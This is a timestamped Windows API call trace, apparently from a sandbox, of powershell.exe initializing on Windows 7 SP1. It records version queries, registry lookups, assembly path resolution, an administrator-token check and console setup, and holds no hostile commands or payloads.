	[0854.998] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x2d89a3c, puLen=0x1ed970) returned 1
	[0854.999] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0854.999] CoTaskMemAlloc (cb=0x20) returned 0x3db2d0
	[0854.999] lstrcpyW (in: lpString1=0x3db2d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0854.999] CoTaskMemFree (pv=0x3db2d0) 
	[0854.999] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x2d896e4, puLen=0x1ed970) returned 1
	[0854.999] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0854.999] CoTaskMemAlloc (cb=0x66) returned 0x3cfe00
	[0854.999] lstrcpyW (in: lpString1=0x3cfe00, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0854.999] CoTaskMemFree (pv=0x3cfe00) 
	[0854.999] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x0, puLen=0x1ed970) returned 0
	[0854.999] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x0, puLen=0x1ed970) returned 0
	[0854.999] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x0, puLen=0x1ed970) returned 0
	[0854.999] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2d8968c, puLen=0x1ed940) returned 1
	[0854.999] CoTaskMemAlloc (cb=0x204) returned 0x377640
	[0854.999] VerLanguageNameW (in: wLang=0x0, szLang=0x377640, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0854.999] CoTaskMemFree (pv=0x377640) 
	[0854.999] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\", lplpBuffer=0x1ed998, puLen=0x1ed990 | out: lplpBuffer=0x1ed998*=0x2d89618, puLen=0x1ed990) returned 1
	[0855.009] CoTaskMemAlloc (cb=0x104) returned 0x3de0a0
	[0855.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3de0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.009] CoTaskMemFree (pv=0x3de0a0) 
	[0855.014] CoTaskMemAlloc (cb=0x104) returned 0x3de0a0
	[0855.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3de0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.014] CoTaskMemFree (pv=0x3de0a0) 
	[0855.019] lstrlenW (lpString="䅁") returned 1
	[0855.028] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed868 | out: phkResult=0x1ed868*=0x2ec) returned 0x0
	[0855.029] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed858 | out: phkResult=0x1ed858*=0x2f0) returned 0x0
	[0855.029] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed8e8 | out: phkResult=0x1ed8e8*=0x2f4) returned 0x0
	[0855.032] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed82c, lpData=0x0, lpcbData=0x1ed828*=0x0 | out: lpType=0x1ed82c*=0x1, lpData=0x0, lpcbData=0x1ed828*=0x56) returned 0x0
	[0855.033] CoTaskMemAlloc (cb=0x5a) returned 0x3cfd90
	[0855.033] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed7fc, lpData=0x3cfd90, lpcbData=0x1ed7f8*=0x56 | out: lpType=0x1ed7fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed7f8*=0x56) returned 0x0
	[0855.033] CoTaskMemFree (pv=0x3cfd90) 
	[0855.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.371] CoTaskMemAlloc (cb=0x104) returned 0x3df4a0
	[0856.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3df4a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.371] CoTaskMemFree (pv=0x3df4a0) 
	[0863.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0863.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0866.704] CoTaskMemAlloc (cb=0x104) returned 0x3e7b50
	[0866.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e7b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.704] CoTaskMemFree (pv=0x3e7b50) 
	[0866.706] CoTaskMemAlloc (cb=0x104) returned 0x3e7b50
	[0866.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e7b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.706] CoTaskMemFree (pv=0x3e7b50) 
	[0867.595] CoTaskMemAlloc (cb=0x104) returned 0x3e7b50
	[0867.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e7b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.595] CoTaskMemFree (pv=0x3e7b50) 
	[0867.597] CoTaskMemAlloc (cb=0x104) returned 0x3e7b50
	[0867.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e7b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.597] CoTaskMemFree (pv=0x3e7b50) 
	[0867.597] CoTaskMemAlloc (cb=0x104) returned 0x3e7b50
	[0867.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e7b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.597] CoTaskMemFree (pv=0x3e7b50) 
	[0874.218] CoTaskMemAlloc (cb=0x104) returned 0x28e8080
	[0874.218] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e8080, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.218] CoTaskMemFree (pv=0x28e8080) 
	[0874.225] CoTaskMemAlloc (cb=0x104) returned 0x28e8080
	[0874.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e8080, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.225] CoTaskMemFree (pv=0x28e8080) 
	[0874.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0900.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0900.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0900.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0900.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.598] CoTaskMemAlloc (cb=0x104) returned 0x3dc300
	[0926.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3dc300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.598] CoTaskMemFree (pv=0x3dc300) 
	[0926.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0927.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0928.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0928.926] SetErrorMode (uMode=0x1) returned 0x1
	[0928.926] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ed7c0 | out: lpFileInformation=0x1ed7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0928.926] SetErrorMode (uMode=0x1) returned 0x1
	[0946.726] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0946.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.726] CoTaskMemFree (pv=0x28fa460) 
	[0948.343] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0948.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.343] CoTaskMemFree (pv=0x28fa460) 
	[0948.344] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0948.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.344] CoTaskMemFree (pv=0x28fa460) 
	[0948.345] CoCreateGuid (in: pguid=0x1edb88 | out: pguid=0x1edb88*(Data1=0x24e9a96f, Data2=0x69d0, Data3=0x4dd6, Data4=([0]=0xb8, [1]=0xd9, [2]=0xb7, [3]=0x27, [4]=0x7a, [5]=0x1a, [6]=0x3f, [7]=0xd6))) returned 0x0
	[0948.349] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0948.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.349] CoTaskMemFree (pv=0x28fa460) 
	[0948.352] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0948.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.352] CoTaskMemFree (pv=0x28fa460) 
	[0948.354] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0948.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.354] CoTaskMemFree (pv=0x28fa460) 
	[0948.378] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0950.622] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ed830 | out: lpConsoleScreenBufferInfo=0x1ed830) returned 1
	[0950.639] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0950.639] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ed830 | out: lpConsoleScreenBufferInfo=0x1ed830) returned 1
	[0950.640] GetVersionExW (in: lpVersionInformation=0x1ed7c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed7c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0950.642] GetCurrentProcess () returned 0xffffffffffffffff
	[0950.643] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ed858 | out: TokenHandle=0x1ed858*=0x2ec) returned 1
	[0950.646] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed778 | out: TokenInformation=0x0, ReturnLength=0x1ed778) returned 0
	[0950.647] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3372a0
	[0950.647] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x8, TokenInformation=0x3372a0, TokenInformationLength=0x4, ReturnLength=0x1ed778 | out: TokenInformation=0x3372a0, ReturnLength=0x1ed778) returned 1
	[0950.648] DuplicateTokenEx (in: hExistingToken=0x2ec, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ed8d8 | out: phNewToken=0x1ed8d8*=0x2f4) returned 1
	[0950.648] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed778 | out: TokenInformation=0x0, ReturnLength=0x1ed778) returned 0
	[0950.648] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3372d0
	[0950.649] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x8, TokenInformation=0x3372d0, TokenInformationLength=0x4, ReturnLength=0x1ed778 | out: TokenInformation=0x3372d0, ReturnLength=0x1ed778) returned 1
	[0950.649] CheckTokenMembership (in: TokenHandle=0x2f4, SidToCheck=0x2dabc60*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ed8e8 | out: IsMember=0x1ed8e8) returned 1
	[0950.649] CloseHandle (hObject=0x2f4) returned 1
	[0950.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0950.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0950.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0950.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0950.674] CoTaskMemAlloc (cb=0x804) returned 0x28fc320
	[0950.674] GetConsoleTitleW (in: lpConsoleTitle=0x28fc320, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0950.675] CoTaskMemFree (pv=0x28fc320) 
	[0961.214] CoTaskMemAlloc (cb=0x804) returned 0x28fcbd0
	[0961.214] GetConsoleTitleW (in: lpConsoleTitle=0x28fcbd0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0961.214] CoTaskMemFree (pv=0x28fcbd0) 
	[0961.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.216] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0961.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0962.379] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x300
	[0962.380] CoCreateGuid (in: pguid=0x1ed9d0 | out: pguid=0x1ed9d0*(Data1=0x103c5b86, Data2=0x2094, Data3=0x401c, Data4=([0]=0x94, [1]=0x62, [2]=0x80, [3]=0x53, [4]=0xd8, [5]=0x44, [6]=0x77, [7]=0x95))) returned 0x0
	[0964.123] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0964.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.123] CoTaskMemFree (pv=0x28fa460) 
	[0966.542] WinSqmIsOptedIn () returned 0x0
	[0966.543] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0966.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.543] CoTaskMemFree (pv=0x28fa460) 
	[0966.546] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0966.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.546] CoTaskMemFree (pv=0x28fa460) 
	[0967.582] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
	[0967.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28fa460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.582] CoTaskMemFree (pv=0x28fa460) 
	[0967.584] CoTaskMemAlloc (cb=0x104) returned 0x28fa460
